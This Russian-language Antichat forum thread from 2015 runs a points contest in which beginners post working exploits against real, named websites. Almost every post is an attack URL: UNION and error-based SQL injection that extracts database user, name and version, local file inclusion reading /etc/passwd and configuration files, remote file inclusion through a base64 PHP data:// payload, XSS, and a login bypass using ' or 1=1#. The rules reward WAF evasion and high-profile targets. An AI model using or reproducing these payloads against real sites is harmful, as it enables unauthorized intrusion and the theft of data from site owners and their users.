Просмотр полной версии : Конкурс уязвимостей для новичков
Правила:
Ваша задача найти уязвимости в веб-приложениях.
Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).
Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.
За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:
Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:
http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables
Код уязвимости:
$query = "SELECT news FROM cds WHERE id=".$_GET['id'];
Уязвимости:
SQL Injection (2 балла)
Stored XSS (2 балла)
Reflected XSS (1 балл)
Local File Inclusion (3 балла)
Remote File Inclusion (4 балла)
Remote Code Execution (5 баллов)
XXE (5 баллов)
Arbitary File Read (3 балла)
Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/
Типы уязвимостей:
Оранжевые (с приложенным исходным кодом уязвимости)
Серые (эксплоит без кода)
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
↑ (https://antichat.live/posts/3855516/)
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.
P. S. активнее, ребят
BabaDook
04.06.2015, 17:48
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
↑ (https://antichat.live/posts/3855537/)
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
↑ (https://antichat.live/posts/3854392/)
Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов
исходники с уязвимостью прибавляют баллы, но можно и без них
Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8
Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0
Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]
Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20
Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1
Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5
Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo
Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1
Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:
http://eu.bosscom.com/product.asp?id=[t]
Какой именно запрос на вывод нужен?
↑ (https://antichat.live/posts/3855555/)
Какой именно запрос на вывод нужен?
если blind, то хотя бы substring версии
↑ (https://antichat.live/posts/3855559/)
если blind, то хотя бы substring версии
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
↑ (https://antichat.live/posts/3855560/)
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
а разница?
↑ (https://antichat.live/posts/3855572/)
а разница?
Для развеивания шаблонного мышления.
↑ (https://antichat.live/posts/3855555/)
Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8
Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0
Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]
Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20
Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1
Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5
Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo
Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1
Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:
http://eu.bosscom.com/product.asp?id=[t]
Какой именно запрос на вывод нужен?
я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,9 99,8,9,10,11,12,13,14,15,16,17,18
Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75
Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2, 999
Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4, 999,6--
Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20 ,1,2%20and%20%220%22=%220&lang=english
Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1
Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999
Сайт: www.justintime.in (http://www.justintime.in)
Уязвимость: SQLi
Эксплоит:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%2 9,user%28%29,database%28%29%29,6+--+
Сайт: www.hergolfgame.com (http://www.hergolfgame.com)
Уязвимость: SQLi
Эксплоит:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,1 0+--+
Сайт: www.secretslk.com (http://www.secretslk.com)
Уязвимость: SQLi
Эксплоит:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29+--+
Сайт: www.localfirstaz.com (http://www.localfirstaz.com)
Уязвимость: SQLi
Эксплоит:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29+--+
↑ (https://antichat.live/posts/3856497/)
Сайт:
www.justintime.in (http://www.justintime.in)
Уязвимость: SQLi
Эксплоит:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%2 9,user%28%29,database%28%29%29,6+--+
Сайт:
www.hergolfgame.com (http://www.hergolfgame.com)
Уязвимость: SQLi
Эксплоит:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,1 0+--+
Сайт:
www.secretslk.com (http://www.secretslk.com)
Уязвимость: SQLi
Эксплоит:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29+--+
Сайт:
www.localfirstaz.com (http://www.localfirstaz.com)
Уязвимость: SQLi
Эксплоит:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29+--+
добавил в таблицу.
↑ (https://antichat.live/posts/3856494/)
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18
Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
http://www.judgement-yard.com/index.php?pageID=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15&detail=log&id=75
Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
http://newchristian.com/view.php?id=999999.9 union all select 1,2,[t]
Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
http://patagonianshells.com/index.php?link=home&seccion=999999.9 union all select 1,2,3,4,[t],6--
Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9" union all select [t],2 and "0"="0&lang=english
Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
http://www.seavernon.com/index.php?id=22&lg=fr or 1=[t] and 1=1
Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=[t]
на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод
Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a, database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9 +--+-
Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3+--+-
Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%2 9,version%28%29%29,3,4,5,6,7,8+--+
Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x 3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%2 8RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
semen6192
14.06.2015, 22:16
Сайт: www.cobranet.org/about (http://www.cobranet.org/about).php?id=1
Уязвимость: SQLi
Эксплоит:
http://www.cobranet.org/about.php?id=9999999 union select 1,2,3,version(),5,6 --
Сайт: http://www.raahauges.com/view-news.php?id=8
Уязвимость: SQLi
Эксплоит: http://www.raahauges.com/view-news.php?id=null union select 1,2,@@Version,4,5 --
Сайт: http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2 ,999,4,5,6,7,8,9,10,11,12,13,14
↑ (https://antichat.live/posts/3858936/)
Сайт:
http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2 ,999,4,5,6,7,8,9,10,11,12,13,14
предыдущие поправьте на нормальный вывод.
↑ (https://antichat.live/posts/3857982/)
Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a, database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9 +--+-
Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3+--+-
Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%2 9,version%28%29%29,3,4,5,6,7,8+--+
Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x 3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%2 8RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
все, 20 баллов набрано, поздравляю!
Neon2211
15.06.2015, 04:27
Cайт:http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201 ,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
Сайт:http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20se lect%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
Сайт:http://gobpo.com/
Уязвимость:SQLi
Эксплойт:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%2 0999,2--
Cайт:http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20selec t%20999,2,3
Cайт:http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,999
Сайт:http://www.focus-lighting.com/
Уязвимость:
Эксплойт:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,999,9
↑ (https://antichat.live/posts/3858940/)
Cайт:
http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201 ,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
Сайт:
http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20se lect%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
Сайт:
http://gobpo.com/
Уязвимость:SQLi
Эксплойт:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%2 0999,2--
Cайт:
http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20selec t%20999,2,3
Cайт:
http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,999
Сайт:
http://www.focus-lighting.com/
Уязвимость:
Эксплойт:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,999,9
очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t
BabaDook
15.06.2015, 13:36
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,version()
Автор, скажите пожалуйста версию, и где вывод
Neon2211
15.06.2015, 13:54
↑ (https://antichat.live/posts/3859044/)
очень много повторов, два из них отсюда:
http://pastebin.com/tRpAyh1t
Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/
Искал через софт !
kingbeef
15.06.2015, 14:11
↑ (https://antichat.live/posts/3859048/)
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,version()
Автор, скажите пожалуйста версию, и где вывод
Вывод в исходном коде.
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,44 444444444
Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,ve rsion()
выдает нам на 473 строке
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';
BabaDook
15.06.2015, 15:02
↑ (https://antichat.live/posts/3859070/)
Вывод в исходном коде.
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,44 444444444
Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,ve rsion()
выдает нам на 473 строке
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';
Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...
Neon2211
15.06.2015, 17:03
Сайт:http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20se lect%20999,2,3,4,5
↑ (https://antichat.live/posts/3859170/)
Сайт:
http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20se lect%20999,2,3,4,5
а вот тут вывода нет.
semen6192
16.06.2015, 19:40
Сайт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=11
Уязвимость: SQLi
Эксплойт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=-11 UNION SELECT @@Version,2,3,4 --
artificer
17.06.2015, 21:58
Сайт:http: (http://www.cqtailian.com/)www.brzozo.com (http://www.brzozo.com)
Уязвимость:Local File Reading
Эксплойт:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1
Так принимается?
↑ (https://antichat.live/posts/3859920/)
Сайт:
http: (http://www.cqtailian.com/)
www.brzozo.com (http://www.brzozo.com)
Уязвимость:Local File Reading
Эксплойт:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1
Так принимается?
принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило
Neon2211
18.06.2015, 00:27
Сайт:www.stateofemergencyltd.com (http://www.stateofemergencyltd.com)
Уязвимость:SQLi
Эксплойт:
http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7
Сайт:www.upani.com (http://www.upani.com)
Уязвимость:SQLi
Эксплойт:
http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box
Cайт:www.corpsport.com (http://www.corpsport.com)
Уязвимость:SQLi
Эксплойт:
http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5
Cайт:www.immobilien-niederzier.com (http://www.immobilien-niederzier.com)
Уязвимость:SQLi
Эксплойт:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,[t]
semen6192
18.06.2015, 12:49
Сайт: http://www.karnaticlabrecords.com/artists.php?id=32
Уязвимость: SQLi
Эксплойт:
http://www.karnaticlabrecords.com/a...CAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) (http://www.karnaticlabrecords.com/artists.php?id=-32+OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELEC T%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29 x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29,%201 ,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29)
всем добавил. sqli из паблика не зачтены.
для тех, кто уже прошел (на данный момент это только @3nvY (https://antichat.live/members/265683/)). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.
Сайт: hfboapps.ucr.edu (http://www.karnaticlabrecords.com/artists.php?id=32)
Уязвимость: LFI
Эксплойт:
http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd
Сайт: www.gamsc.com (http://www.gamsc.com)
Уязвимость: LFI
Эксплойт:
http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd
Сайт: www.mycklaflon.se (http://www.mycklaflon.se)
Уязвимость: RFI
Эксплойт:
www.mycklaflon.se/index1.asp?page=http://www.vk.com
↑ (https://antichat.live/posts/3862080/)
Сайт:
www.mycklaflon.se (http://www.mycklaflon.se)
Уязвимость: RFI
Эксплойт:
www.mycklaflon.se/index1.asp?page=http://www.vk.com
не RFI, но IFRAME Injection
semen6192
25.06.2015, 22:53
1)Сайт: http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт: http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --
2)Сайт: http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15-- (http://prontowash.com/usa/location.php?id=-2%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14,15--)
3)Сайт: http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт: http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт: http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт: http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт: http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru')
Сайт: www.walkandtrain.com (http://www.walkandtrain.com)
Уязвимость: RFI
Эксплоит:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.
↑ (https://antichat.live/posts/3863249/)
Сайт:
www.walkandtrain.com (http://www.walkandtrain.com)
Уязвимость: RFI
Эксплоит:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.
да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт
↑ (https://antichat.live/posts/3863249/)
Сайт:
www.walkandtrain.com (http://www.walkandtrain.com)
Уязвимость: RFI
Эксплоит:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий
↑ (https://antichat.live/posts/3863291/)
То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий
ответ на вопрос. но да, это RFI
Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный , а то так бы и продолжал морально разлагаться и в игрушки играть.
↑ (https://antichat.live/posts/3862412/)
1)Сайт:
http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт:
http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --
2)Сайт:
http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт:
http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15-- (http://prontowash.com/usa/location.php?id=-2%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14,15--)
3)Сайт:
http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт:
http://www.comtecwash.com/photos.php?id=-1
UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт:
http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт:
http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт:
http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт:
http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт:
http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт:
http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru')
SQL защитано, XSS нет, в конкурсе запрещены ru/ua
semen6192
30.06.2015, 00:26
1)Сайт: http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php (http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=%2Findex.php)
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу:Online registred users:admin и т.д
2) Сайт: http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
